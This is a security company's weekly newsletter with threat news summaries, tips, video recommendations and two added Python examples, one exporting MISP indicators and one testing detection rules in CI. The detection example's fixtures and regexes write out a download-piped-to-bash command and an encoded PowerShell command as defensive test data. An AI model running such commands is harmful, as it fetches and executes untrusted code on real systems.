Hello there 👋
Welcome back to the Kraven Security weekly newsletter. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories
New Phishing Tactics Exploit GitHub, Telegram Bots, and QR Codes
Cybercriminals are now leveraging GitHub repositories, Telegram bots, and even ASCII/Unicode QR codes to orchestrate sophisticated phishing attacks.
Key takeaways:
🪲 GitHub Exploitation: Cyber attackers use GitHub to host malicious files, often through comments or issues that are quickly deleted to evade detection.
🤖 Telegram Bot Abuse: Bots are programmed to automate phishing by interacting with victims, making scams more convincing and efficient.
🖼️ Innovative QR Codes: Scammers employ QR codes made from ASCII and Unicode characters, which are harder for security systems to flag.
🏦 Targeted Attacks: The finance sector is particularly at risk, with attackers using these tools to distribute malware such as Remcos RAT.
Escalating Cyber Threats: Insights into 2024’s Ransomware Landscape
Ransomware attacks are on the rise with a significant focus on healthcare, leveraging new vulnerabilities in ESXi hypervisors for mass encryption. Microsoft reports a troubling increase in human-operated attacks and a doubling of data exfiltration incidents, highlighting a shift towards more sophisticated cybercrime tactics.
Key takeaways:
🔒 Increased Sophistication: Human-operated ransomware attacks have tripled, indicating a shift towards more targeted and complex cyber operations, with attackers now frequently engaging in data theft alongside encryption.
🏥 Healthcare in the Crosshairs: The healthcare sector remains a prime target, with 34 organizations affected indirectly through a third-party service provider, showcasing the ripple effect of ransomware attacks through supply chains.
💻 ESXi Exploit: Cybersecurity researchers discovered a widespread exploit of ESXi hypervisors, allowing attackers administrative access and the capability to encrypt entire systems, disrupting virtual machine operations.
📈 Data Theft Surge: There’s been a noticeable increase in data exfiltration, with attackers not just encrypting but also stealing data, escalating the risks for affected organizations.
🚨 Ransomware Tracker Insights: May 2024 saw a peak in claimed ransomware victims, with groups like LockBit making significant noise, though the accuracy of these claims remains under scrutiny.
UK Schools Gain Enhanced Cyber Defense with PDNS Expansion
The UK’s NCSC has expanded its PDNS for Schools service, now offering enhanced cyber protection against threats like ransomware to all UK educational institutions for free. This move is part of a broader initiative to bolster cybersecurity in the education sector amidst rising cyber threats.
Key takeaways:
🛡️ Enhanced Cyber Protection: The UK’s National Cyber Security Centre (NCSC) has expanded its Protective Domain Name System (PDNS) service to all UK schools, including academies, independent schools, and multi-academy trusts.
📚 Free Service for All: This service, now available through partnerships with Cloudflare and Accenture, aims to block access to malicious websites at no cost to educational institutions.
🚨 Combatting Rising Threats: The expansion follows reports of significant cyber incidents in UK schools, with an aim to protect against malware, ransomware, and phishing attacks.
🔒 Encouragement to Adopt: Schools and educational service providers are encouraged to register for PDNS through MyNCSC, enhancing their resilience against online threats.
🌐 Broader Cybersecurity Initiative: Part of a larger effort by NCSC to improve cybersecurity across the education sector, reflecting increased cyber threats like cryptojacking and IoT malware.
TrickMo Malware Targets Android Users with PIN-Stealing Fake Lock Screens
New Android malware, TrickMo, tricks users into revealing their PIN via fake lock screens. Protect your device by staying vigilant and updating apps regularly!
Key takeaways:
🔍 Fake Lock Screen: TrickMo disguises itself as a legitimate lock screen prompt, prompting users to enter their PIN to unlock their device.
🛑 PIN Theft: Once entered, the malware captures the PIN, potentially granting unauthorized access to the device.
📲 Delivery Method: The malware is often disguised within fake apps or via phishing links, exploiting users’ trust in familiar app interfaces.
🛡️ Mitigation: Regularly updating your Android apps and being cautious with app installations can help protect against such threats.
🔄 Ongoing Threat: This type of attack underscores the importance of constant vigilance in cybersecurity practices.
North Korean IT Workers Escalate Cyber Threats with Data Theft and Extortion
Undercover North Korean IT workers are not just stealing data but now extorting employers with the threat of information leaks. Western companies are becoming unwitting victims in this sophisticated scheme, fueling North Korea’s illicit revenue streams.
Key takeaways:
💻 Data Theft: North Korean IT professionals, after gaining employment under false pretenses, steal sensitive data from their unsuspecting employers.
💰 Ransom Demands: Following termination or after amassing enough data, these workers demand ransoms to not leak the information, escalating from mere salary fraud to outright extortion.
🌐 Laptop Farms: They use “laptop farms” in the US to appear as if they’re working locally, routing their activities through these setups to mask their true location.
🔍 Coordination and Tactics: Referred to by names like “Nickel Tapestry” or “UNC5267”, they use VPNs, remote access software, and even residential proxies to coordinate their activities covertly.
🤝 Employers Unwittingly Involved: Companies, including major corporations, have fallen victim, highlighting a significant vulnerability in remote hiring and cybersecurity practices.
Top Tips of the Week
Threat Intelligence
- Regularly update CTI analysts’ skills. Continuous learning ensures expertise aligns with evolving threat landscapes.
- Conduct regular threat intelligence exercises. Simulate scenarios to test CTI readiness and identify areas for improvement.
Threat Hunting
- Understand the tactics, techniques, and procedures (TTPs) of cyber threat actors. Identify and respond effectively to their methods.
- Develop hypotheses for cyber threat hunting. Form educated guesses about potential threats and use them as guides in your investigations.
- Implement a response plan. Be prepared to act swiftly when a threat is detected. A well-defined plan is crucial.
- Monitor supply chain risks in cyber threat hunting. Assess and address vulnerabilities to mitigate potential threats.
Custom Tooling
- Implement error reporting and analysis in custom tools. Quickly identify and address issues to maintain tool reliability.
Feature Article
MISP (Malware Information Sharing Platform and Threat Sharing) is an open-source threat intelligence platform that allows you to share, collate, analyze, and distribute threat intelligence.
Discover how to use the web interface and API to export attributes from your MISP instance as IOCs. Then, upload these IOCs to your security solutions for detection and blocking, either manually or automatically.
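The API half of that workflow, as an added example rather than code from the article or the MISP project: it queries MISP's /attributes/restSearch endpoint for attributes an analyst has flagged for detection (to_ids), groups them into per-type blocklists, and writes one file per type for a firewall, proxy or EDR to ingest. The endpoint, request keys and response shape are MISP's REST API; MISP_URL and MISP_KEY are placeholders, and SAMPLE_RESPONSE is constructed so the conversion runs offline.

```python
"""Export to_ids attributes from MISP as per-type IOC blocklists.

Added example, not code from the Kraven Security article or the MISP project.
The /attributes/restSearch endpoint, the request body keys and the
{"response": {"Attribute": [...]}} shape are MISP's REST API; MISP_URL and
MISP_KEY are placeholders, and SAMPLE_RESPONSE below is constructed so the
conversion can be exercised offline.
"""
import json
import urllib.request
from collections import defaultdict

MISP_URL = "https://misp.example.org"      # placeholder: your MISP instance
MISP_KEY = "REPLACE_WITH_MISP_API_KEY"     # placeholder: an auth key with read access

# Which MISP attribute types feed which blocklist.
EXPORT_TYPES = {
    "ip": ["ip-dst", "ip-src"],
    "domain": ["domain", "hostname"],
    "hash": ["md5", "sha1", "sha256"],
}
TYPE_TO_FEED = {t: feed for feed, types in EXPORT_TYPES.items() for t in types}


def build_search_body(last="7d"):
    """Request body for POST /attributes/restSearch: only attributes an analyst
    flagged for detection (to_ids) from published events in the last window,
    with values on MISP's warninglists (e.g. well-known CDN ranges) dropped."""
    return {
        "returnFormat": "json",
        "type": list(TYPE_TO_FEED),
        "to_ids": 1,
        "published": 1,
        "last": last,
        "enforceWarninglist": 1,
    }


def fetch_attributes(last="7d"):
    """Query the live instance (needs network access and a valid key)."""
    req = urllib.request.Request(
        f"{MISP_URL}/attributes/restSearch",
        data=json.dumps(build_search_body(last)).encode(),
        headers={
            "Authorization": MISP_KEY,
            "Accept": "application/json",
            "Content-Type": "application/json",
        },
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


def iocs_from_response(payload):
    """Map a restSearch JSON payload to {feed_name: set(values)}.

    Re-checks to_ids client-side (older servers return it as "1"), ignores
    attribute types with no blocklist, normalises hashes to lowercase and
    deduplicates values that appear in several events."""
    feeds = defaultdict(set)
    for attr in payload.get("response", {}).get("Attribute", []):
        if attr.get("to_ids") not in (True, 1, "1"):
            continue
        feed = TYPE_TO_FEED.get(attr.get("type"))
        if feed is None:
            continue
        value = attr["value"].strip()
        feeds[feed].add(value.lower() if feed == "hash" else value)
    return dict(feeds)


def render_blocklist(values):
    """One indicator per line, sorted, so diffs between exports stay readable."""
    return "".join(f"{v}\n" for v in sorted(values))


# Constructed sample in the shape MISP returns; not real intelligence.
SAMPLE_RESPONSE = {
    "response": {
        "Attribute": [
            {"event_id": "42", "type": "ip-dst", "value": "203.0.113.10", "to_ids": True},
            {"event_id": "42", "type": "domain", "value": "bad.example", "to_ids": True},
            {"event_id": "43", "type": "sha256", "value": "AB" * 32, "to_ids": True},
            # Analyst left to_ids off: context only, must not reach a blocklist.
            {"event_id": "43", "type": "ip-dst", "value": "198.51.100.7", "to_ids": False},
            # Free-text attribute type with no blocklist mapping.
            {"event_id": "43", "type": "comment", "value": "seen in a phishing kit", "to_ids": True},
            # Same IP reported in a second event: deduplicated.
            {"event_id": "44", "type": "ip-dst", "value": "203.0.113.10", "to_ids": "1"},
        ]
    }
}

if __name__ == "__main__":
    # Swap SAMPLE_RESPONSE for fetch_attributes() against a real instance.
    for feed, values in iocs_from_response(SAMPLE_RESPONSE).items():
        with open(f"misp_{feed}.txt", "w") as fh:
            fh.write(render_blocklist(values))
```

The to_ids flag is the part worth getting right: MISP stores plenty of context (comments, attributes an analyst judged too noisy to block), and exporting everything that matches a type filter is how a legitimate CDN range ends up on a firewall denylist. Filtering on to_ids server-side and again client-side, plus enforceWarninglist, keeps the export to what an analyst actually marked for detection.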
Learning Resources
Detection as Code: Why You Should Consider It
In this video, David French walks through how to build a “Detection-as-Code” pipeline, discussing the importance of automating detection rules in cybersecurity tools. He shares practical examples of integrating DevOps practices into security, using CI/CD pipelines, version control, and collaboration to create a detection system that catches security threats more effectively.
The video emphasizes the growing popularity of detection-as-code approaches, highlighting the benefits of using automation to manage security rules. By integrating tools like GitLab and GitHub for version control and CI/CD pipelines for deployment, teams can ensure that their detection rules are efficient, tested, and well-maintained. This system allows for better collaboration and a more resilient defense against potential security threats.
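What "tested and well-maintained" looks like in practice, as an added example that is not from the video or any vendor: detection rules live in the repository as data, and a CI stage lints each one (schema, severity, regex compiles) and replays its must-hit and must-miss fixtures before anything is deployed. The rule format and the fixtures here are made up for illustration; a real pipeline would translate the validated rules into the SIEM's own syntax.

```python
"""Detection-as-code: rules kept as data in version control, linted and
regression-tested in CI before they are pushed to the SIEM.

Added example, not code from the video or from any vendor. The rule format
(id, field, regex, severity) and the fixtures are made up for illustration;
a real pipeline would translate validated rules into the SIEM's own syntax.
"""
import re

VALID_SEVERITIES = {"low", "medium", "high", "critical"}
REQUIRED_KEYS = {"id", "name", "field", "regex", "severity"}

# Constructed rules: what a rules/ directory in the repo would hold.
RULES = [
    {"id": "dc-001", "name": "PowerShell encoded command", "field": "cmdline",
     "regex": r"powershell(\.exe)?\s.*-(e|enc|encodedcommand)\s", "severity": "high"},
    {"id": "dc-002", "name": "Download piped to shell", "field": "cmdline",
     "regex": r"\b(curl|wget)\s.*\|\s*(ba|z)?sh\b", "severity": "medium"},
]

# Constructed fixtures: every rule ships with events it must and must not hit.
FIXTURES = {
    "dc-001": {
        "match": [{"cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"}],
        "no_match": [{"cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"}],
    },
    "dc-002": {
        "match": [{"cmdline": "curl -s http://203.0.113.5/i.sh | bash"}],
        "no_match": [{"cmdline": "curl -s https://api.example/health"}],
    },
}


def lint_rule(rule):
    """Static checks a CI job runs on each rule: schema, severity, regex compiles."""
    errors = []
    missing = REQUIRED_KEYS - set(rule)
    if missing:
        errors.append(f"missing keys: {sorted(missing)}")
    if rule.get("severity") not in VALID_SEVERITIES:
        errors.append(f"unknown severity {rule.get('severity')!r}")
    try:
        re.compile(rule.get("regex", ""))
    except re.error as exc:
        errors.append(f"regex does not compile: {exc}")
    return errors


def evaluate(rule, event):
    """Does this rule fire on this event? A missing field means no match."""
    value = event.get(rule["field"])
    return value is not None and re.search(rule["regex"], value, re.IGNORECASE) is not None


def run_fixtures(rules, fixtures):
    """Regression test: {rule_id: [failure descriptions]} for every failing rule."""
    failures = {}
    for rule in rules:
        problems = []
        fx = fixtures.get(rule["id"])
        if fx is None:
            problems.append("no fixtures: rule is untested")
        else:
            for ev in fx.get("match", []):
                if not evaluate(rule, ev):
                    problems.append(f"expected hit, got miss: {ev}")
            for ev in fx.get("no_match", []):
                if evaluate(rule, ev):
                    problems.append(f"expected miss, got hit (false positive): {ev}")
        if problems:
            failures[rule["id"]] = problems
    return failures


def ci_gate(rules, fixtures):
    """The pipeline stage's verdict: (ok, report). Deploy only when ok is True."""
    report = {}
    for rule in rules:
        errs = lint_rule(rule)
        if errs:
            report[rule.get("id", "<no id>")] = errs
    report.update(run_fixtures([r for r in rules if not lint_rule(r)], fixtures))
    return (not report), report


if __name__ == "__main__":
    ok, report = ci_gate(RULES, FIXTURES)
    print("deploy" if ok else f"blocked: {report}")
```

The no_match fixtures are the ones teams tend to skip, and they are what stops a rule edit from silently turning a benign admin command into a daily false positive; a rule with no fixtures at all fails the gate on purpose.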
Watchmaker to Threat Hunter
In this captivating episode of “Simply Defensive,” Jibby, a former watch repairman, shares his unique path into cybersecurity. Despite lacking a tech background, Jibby’s determination led him to transition from watch repair to becoming a threat hunter at Microsoft.
From starting with a basic laptop to mastering cybersecurity tools like KC7, Jibby exemplifies how passion and persistence can lead to success in a highly technical field. His journey from watchmaker to a Microsoft security researcher highlights the power of curiosity, mentorship, and continuous learning in the world of threat hunting.
Discover the Powerful Python Features in VSCode
Python developer? Learn to make the most of VSCode with these essential features to improve productivity, including generating Jupyter notebook cells directly in Python files, Auto Docstring, and Pylance.
The video also explores the value of using VSCode’s Live Share feature for real-time collaboration, allowing developers to share their workspaces and terminals with teammates seamlessly. These features, combined with tips on configuration, help Python developers streamline their workflow in VSCode.
What’s Going on With WordPress?
WordPress is blowing up right now as the legal conflict between Matt Mullenweg, WordPress founder, and WP Engine over royalties and trademark use heats up. Mullenweg faces criticism for his leadership, while Automattic, his company, demands millions from WP Engine, leading to lawsuits and public disputes.
Despite the drama, WordPress continues to dominate web development, powering over 40% of websites. However, the tension between these companies raises questions about open-source ethics and the future of the WordPress ecosystem.
This video by Fireship beautifully sums up the ongoing situation.
Personal Notes
🤔 The push to better use AI has been the focus of this week. The team and I have been researching and experimenting with “prompt engineering” to inject AI into our current workflow.
AI offers the chance to automate, streamline, and make many of our processes more efficient. Mastering prompt engineering is key to integrating AI into our operations so we can extract the maximum benefit. Hence, most of the week has been spent trying different AI models, trying different combinations of prompts and prompt elements, and sharing what we have learned across the business.
I recommend everyone, from cyber security professionals to business leaders, explore how AI can benefit them by learning about prompt engineering! A good book to get you started is Unlocking the Secrets of Prompt Engineering, or check out the Jeff Su YouTube channel.